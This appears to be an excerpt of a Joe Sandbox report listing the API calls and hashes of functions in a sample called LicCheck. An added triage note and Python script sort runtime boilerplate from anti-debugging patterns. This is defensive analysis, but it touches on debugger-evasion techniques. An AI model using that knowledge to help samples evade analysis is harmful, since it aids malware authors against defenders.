                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 254469556-0
                                                                                                    • Opcode ID: cd71751a2c0f4648eeafa23726e76095f25e504f5d04d3d476dde6be3ed03cbe
                                                                                                    • Instruction ID: a2a356cf7971012c5d6e56ad345dd0e5b1386f07850b7d39588622bc1fd82129
                                                                                                    • Opcode Fuzzy Hash: cd71751a2c0f4648eeafa23726e76095f25e504f5d04d3d476dde6be3ed03cbe
                                                                                                    • Instruction Fuzzy Hash: 14310575D0121CDBDB20DFA4D989BCCBBB8BF08300F1041AAE409AB250EB759A848F55
                                                                                                    APIs
                                                                                                      • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
                                                                                                      • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007BD300
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007BD34A
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007BD410
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 661929714-0
                                                                                                    • Opcode ID: 17a51abeb3700b62a19bc9b2a6d87a8b425201fa38a2f58b85acc050b93945c6
                                                                                                    • Instruction ID: 692387843a5d34040290cfe76498b2b3a3efd88e68ce4bd0ccc7daadf52565fa
                                                                                                    • Opcode Fuzzy Hash: 17a51abeb3700b62a19bc9b2a6d87a8b425201fa38a2f58b85acc050b93945c6
                                                                                                    • Instruction Fuzzy Hash: 0C614771900617EBDB389F28C886BEA77A8EF04301F1441AAED15C6585FB3CED85CB60
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 007A9CEB
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 007A9CF5
                                                                                                    • UnhandledExceptionFilter.KERNEL32(C00000EF,?,?,?,?,?,?), ref: 007A9D02
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: 17ee3e56cda6fd51f57af49295b6e07cfc8049e57294393cf3e52313d07a6f96
                                                                                                    • Instruction ID: 799a6c4495b089ba6ff819e99ab7fe2c1fb180a1694cbd8cb7982f8b19f5fb7d
                                                                                                    • Opcode Fuzzy Hash: 17ee3e56cda6fd51f57af49295b6e07cfc8049e57294393cf3e52313d07a6f96
                                                                                                    • Instruction Fuzzy Hash: 3831B275901228DBCB21DF68D989B8CBBB8FF48310F6042DAE51CA7251E7749BC58F54
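A triage note on the entries above. The two functions at 007A5B76 and 007A9CEB (IsProcessorFeaturePresent(0x17), IsDebuggerPresent, SetUnhandledExceptionFilter(NULL), UnhandledExceptionFilter) have the shape of the MSVC runtime's own failure-reporting code, which clears the exception filter and hands the fault straight to the default one; 0x17 is PF_FASTFAIL_AVAILABLE, the probe the runtime makes before choosing __fastfail. The GetACP / IsValidCodePage / GetLocaleInfoW / EnumSystemLocalesW entries around them are the runtime's setlocale() support. None of this is the sample's own anti-analysis code, and it is not the source of the "CheckRemoteDebuggerPresent" finding in the report summary. The discriminator worth checking by hand is the first argument of SetUnhandledExceptionFilter: the runtime passes NULL, whereas an SEH-based anti-debug trick registers a real handler. The script below is an added example, not part of the report or of the sample: it parses "APIs" lines exactly as printed here and labels each function. The entries copied from this report keep their addresses; the two "hyp-" entries, the ExitProcess call and the address 00401100 are constructed contrasts.

```python
"""Triage of Joe Sandbox "APIs" listings: runtime boilerplate vs. analyst-relevant calls.

Added example; not part of the report or of the sample.  The report's function
entries are copied verbatim below; the two "hyp-" entries are constructed.
"""
import re
from dataclasses import dataclass

# winnt.h: PF_FASTFAIL_AVAILABLE == 23.  The MSVC runtime probes this feature
# before choosing between __fastfail and the UnhandledExceptionFilter path.
PF_FASTFAIL_AVAILABLE = 0x17

# Imports used by the MSVC runtime's setlocale()/code-page initialisation.
CRT_LOCALE_APIS = {"GetACP", "IsValidCodePage", "GetLocaleInfoW",
                   "EnumSystemLocalesW", "GetLastError", "SetLastError"}

# One call line as printed under "APIs": optional "Part of subcall function"
# prefix, Api.MODULE, optional argument list, ", ref: <address>".
_API_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int            # address of the call site
    from_subcall: bool  # reported from a callee, not from this function itself


def parse_api_lines(text: str) -> list:
    """Parse the bullet lines of one "APIs" section into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.search(line)
        if m:
            args = tuple(a for a in (m.group("args") or "").split(",") if a)
            calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                 int(m.group("ref"), 16), m.group("sub") is not None))
    return calls


def classify(calls: list) -> str:
    """Label a function by its direct (non-subcall) imports."""
    direct = {c.api: c for c in calls if not c.from_subcall}
    names = set(direct)
    suef = direct.get("SetUnhandledExceptionFilter")
    uef = direct.get("UnhandledExceptionFilter")
    # Runtime failure report: the filter is cleared (NULL argument) and the
    # default filter is invoked right after it, so the fault goes to WER.
    if suef and uef and suef.args[:1] == ("00000000",) and uef.ref > suef.ref:
        ipfp = direct.get("IsProcessorFeaturePresent")
        probe = ipfp is not None and ipfp.args[:1] == ("%08X" % PF_FASTFAIL_AVAILABLE,)
        return "crt-failfast" + ("+fastfail-probe" if probe else "")
    # A handler registered without a matching UnhandledExceptionFilter call is
    # the shape of SEH-based anti-debugging, not of the runtime's report path.
    if suef and not uef:
        return "review: custom exception filter registered"
    if names & {"IsDebuggerPresent", "CheckRemoteDebuggerPresent"}:
        return "review: debugger check outside runtime report path"
    if names and names <= CRT_LOCALE_APIS:
        return "crt-locale"
    if names == {"IsProcessorFeaturePresent"}:
        return "crt-feature-probe"
    return "review"


# Copied from the report's "APIs" listings (addresses are the report's own).
REPORT_ENTRIES = {
    "007A5B76": """
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 007A5B76
• IsDebuggerPresent.KERNEL32 ref: 007A5C42
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007A5C62
• UnhandledExceptionFilter.KERNEL32(?), ref: 007A5C6C
""",
    "007A9CEB": """
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 007A9CEB
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 007A9CF5
• UnhandledExceptionFilter.KERNEL32(C00000EF,?,?,?,?,?,?), ref: 007A9D02
""",
    "007BCF5A": """
  • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
  • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
• GetACP.KERNEL32(?,?,?,?,?,?,007B098E,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 007BCF5A
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,007B098E,?,?,?,00000055,?,-00000050,?,?), ref: 007BCF85
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 007BD0E8
""",
    "007A582B": """
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007A582B
""",
}

# Constructed contrast cases with hypothetical addresses; not from the report.
CONSTRUCTED_ENTRIES = {
    "hyp-antidebug": """
• IsDebuggerPresent.KERNEL32 ref: 00401010
• ExitProcess.KERNEL32(00000001), ref: 00401020
""",
    "hyp-custom-filter": """
• SetUnhandledExceptionFilter.KERNEL32(00401100), ref: 00401050
""",
}


def triage(entries: dict) -> dict:
    """Map each entry name to its label."""
    return {name: classify(parse_api_lines(text)) for name, text in entries.items()}


if __name__ == "__main__":
    for name, verdict in triage({**REPORT_ENTRIES, **CONSTRUCTED_ENTRIES}).items():
        print(f"{name:18} {verdict}")
```

Subcall lines are parsed but deliberately excluded from the label, since the report attributes them to the callee (007B2340 here), and the same GetLastError/SetLastError pair shows up under every locale function regardless of what the caller does.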
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,007B14F4,?,20001004,00000000,00000002,?,?,007B0AF6), ref: 007B5215
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: InfoLocale
• String ID: 0'y
• API String ID: 2299586839-674645887
• Opcode ID: f3837294afdbcaac504bfb1d35e567238812c753b37f12e1c7abe50db5fda356
• Instruction ID: 30477b2081a83740b879ce6936fcf92f2f3cf9273c6b5c4e6f8bcc3dd93beb8c
• Opcode Fuzzy Hash: f3837294afdbcaac504bfb1d35e567238812c753b37f12e1c7abe50db5fda356
• Instruction Fuzzy Hash: FCE01A71505A2CBBCB122F61DC09FDE3B26FB44751F084414F905662618B7A9920AA94
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007A582B
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 06d0e311c79860b566f267867ff6a436c828ddca3b60967a483c760425fc15ce
• Instruction ID: 24477b3d8482f6ccfeee559b189245785099cdd593df413fc3ddeb3d0794ab7d
• Opcode Fuzzy Hash: 06d0e311c79860b566f267867ff6a436c828ddca3b60967a483c760425fc15ce
• Instruction Fuzzy Hash: C5514DB1A12A05CFEB14CFA8D8957AEB7F4FB85310F24C56AD405EB261D37CA940CB54
APIs
  • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
  • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007BD553
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 8bc757e3a356ced8d8c34bdfb0f42397e635c97d812f930e5a200246e6d794f2
• Instruction ID: 8d28260fbefe687f7281e1cb8e025f4a9fd26ffde3c74223052281fa3d284e6c
• Opcode Fuzzy Hash: 8bc757e3a356ced8d8c34bdfb0f42397e635c97d812f930e5a200246e6d794f2
• Instruction Fuzzy Hash: AB217C7261521AABEB389F25DC46BFA77A8EF44318B14406AF902C7141FA3CAD508B64
APIs
  • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
  • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
• EnumSystemLocalesW.KERNEL32(007BD2AC,00000001,00000000,?,-00000050,?,007BD8DD,00000000,?,?,?,00000055,?), ref: 007BD1F8
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: c1602946e866cbda0c4f4f1840c949b95821ce02a3dfa96c7c9571bdc40a847c
• Instruction ID: 72d9e643e48e9ae0baddd78c51b28c0b3440205211a1739a5ae88eb65d64731a
• Opcode Fuzzy Hash: c1602946e866cbda0c4f4f1840c949b95821ce02a3dfa96c7c9571bdc40a847c
• Instruction Fuzzy Hash: BA11E93A2007099FDB289F39C8957FAB791FF84358B19852DE94687B40E779BD42C740
APIs
  • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
  • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,007BD4C8,00000000,00000000,?), ref: 007BD75A
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 8616610def448f9178be19beae719054bd1b0d8ad6eeeffa81c67ef40ca6f0df
• Instruction ID: 5370908fc42ba8802f5f369b1ff7fdca50912c7a6c3060012dd70bb3e7ec47b4
• Opcode Fuzzy Hash: 8616610def448f9178be19beae719054bd1b0d8ad6eeeffa81c67ef40ca6f0df
• Instruction Fuzzy Hash: E6F08137610116BBDB389A348809BFE77A9EB40754F154568EC56A3180FE7CFE41C690
APIs
  • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
  • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
• EnumSystemLocalesW.KERNEL32(007BD4FF,00000001,00000000,?,-00000050,?,007BD8A1,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 007BD26B
Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2417226690-0
                                                                                                    • Opcode ID: 3070f78c28640229ba51b43ad25926901b43a403d54e3e253e12466b11aff283
                                                                                                    • Instruction ID: ee53eaa3665b53b2ab126109e09cdaaacdb06d2e426f68a7b977f29293d51352
                                                                                                    • Opcode Fuzzy Hash: 3070f78c28640229ba51b43ad25926901b43a403d54e3e253e12466b11aff283
                                                                                                    • Instruction Fuzzy Hash: E0F0C2362003445FDB245F799885BEA7B91FF81368B09842DF9068B690E6BAAC428650
                                                                                                    APIs
                                                                                                      • Part of subcall function 007ADD02: EnterCriticalSection.KERNEL32(?,?,007B1989,00000000,007D40D8,0000000C,007B1950,?,?,007B2ACF,?,?,007B24DE,00000001,00000364,?), ref: 007ADD11
                                                                                                    • EnumSystemLocalesW.KERNEL32(007B4CAE,00000001,007D42A0,0000000C,007B50DD,00000000), ref: 007B4CF3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1272433827-0
                                                                                                    • Opcode ID: 30740a4a68b6c066a9fa5b9a5b28cf594235257c502ea99a1f2fe52b52da8925
                                                                                                    • Instruction ID: d9a79c448337152b28d284d19f8a3b43545c89e0a0fb252c6f6e3cc3b6832e80
                                                                                                    • Opcode Fuzzy Hash: 30740a4a68b6c066a9fa5b9a5b28cf594235257c502ea99a1f2fe52b52da8925
                                                                                                    • Instruction Fuzzy Hash: 0BF04F76A01604DFD700EF98E846B9D7BB1FB49721F10821BF401DB2A1CBBE59008B54
                                                                                                    APIs
                                                                                                      • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
                                                                                                      • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
                                                                                                    • EnumSystemLocalesW.KERNEL32(007BD094,00000001,00000000,?,?,007BD8FF,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 007BD172
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2417226690-0
                                                                                                    • Opcode ID: 1f53b8b1b0618835d5bc3ab72309a951d48473e1550b589ec7844f612b55fe91
                                                                                                    • Instruction ID: daac3edeb72a7f4d1f884ad0a20d18a85b8eb16d7ca00a0a7882079927542fa2
                                                                                                    • Opcode Fuzzy Hash: 1f53b8b1b0618835d5bc3ab72309a951d48473e1550b589ec7844f612b55fe91
                                                                                                    • Instruction Fuzzy Hash: 78F0E536300209A7CB15AF39DC59BAABF95EFC2714F0B4059EA058B251D67EDD83C790
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00015CD8,007A5225), ref: 007A5CD1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: 9b06f276c3d59efe7294ad26c11b07b60de8fb1975129d7e3449e1dc495c10f1
                                                                                                    • Instruction ID: 6331be0b4cbd1b7f2307b1e06a3f721325922452601d87e56fe0c094d5fcef17
                                                                                                    • Opcode Fuzzy Hash: 9b06f276c3d59efe7294ad26c11b07b60de8fb1975129d7e3449e1dc495c10f1
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: 28f842f379cfcab6bb501974b1b78bb8fd92ad0d0a9b68910126dc453dbe2cf6
                                                                                                    • Instruction ID: 779ddedc58d17547e8a282e130175c2ca9a3a9326e3396c67256bee6a869653a
                                                                                                    • Opcode Fuzzy Hash: 28f842f379cfcab6bb501974b1b78bb8fd92ad0d0a9b68910126dc453dbe2cf6
                                                                                                    • Instruction Fuzzy Hash: CBA011B030AA008B83008F32AA082083BAAAA002C0308C02AA808C8020EB2E80808F88
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5b6064b1d285803d4cb0220968fdc1f1fa7642ad5c254f0c01c5dc199024f09b
                                                                                                    • Instruction ID: 814d12ecc4cc425aa54436e3229ea6d2c9732fb0d4f2f650aec5b108dce3504d
                                                                                                    • Opcode Fuzzy Hash: 5b6064b1d285803d4cb0220968fdc1f1fa7642ad5c254f0c01c5dc199024f09b
                                                                                                    • Instruction Fuzzy Hash: 5EE08C32911228EBCB14DBC9C908ACEF3ECFB44B00B150096F911D3211C2B4DE00C7D0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0acb759024605fc42b6b8bdead4ad15610ee751142ab1ecb42ef976f49e53a40
                                                                                                    • Instruction ID: a44da2c7a3d5659b00e5f02f12658962a00a23296401805d7a9c62723af5d59d
                                                                                                    • Opcode Fuzzy Hash: 0acb759024605fc42b6b8bdead4ad15610ee751142ab1ecb42ef976f49e53a40
                                                                                                    • Instruction Fuzzy Hash: FCC08C380009008ACE29891082753EA7364FBD37C6F80059CF8020B652CB1E9C82EB80
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00799429
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00799475
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0079954D
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 007995E2
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00799607
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0079960C
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00799611
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
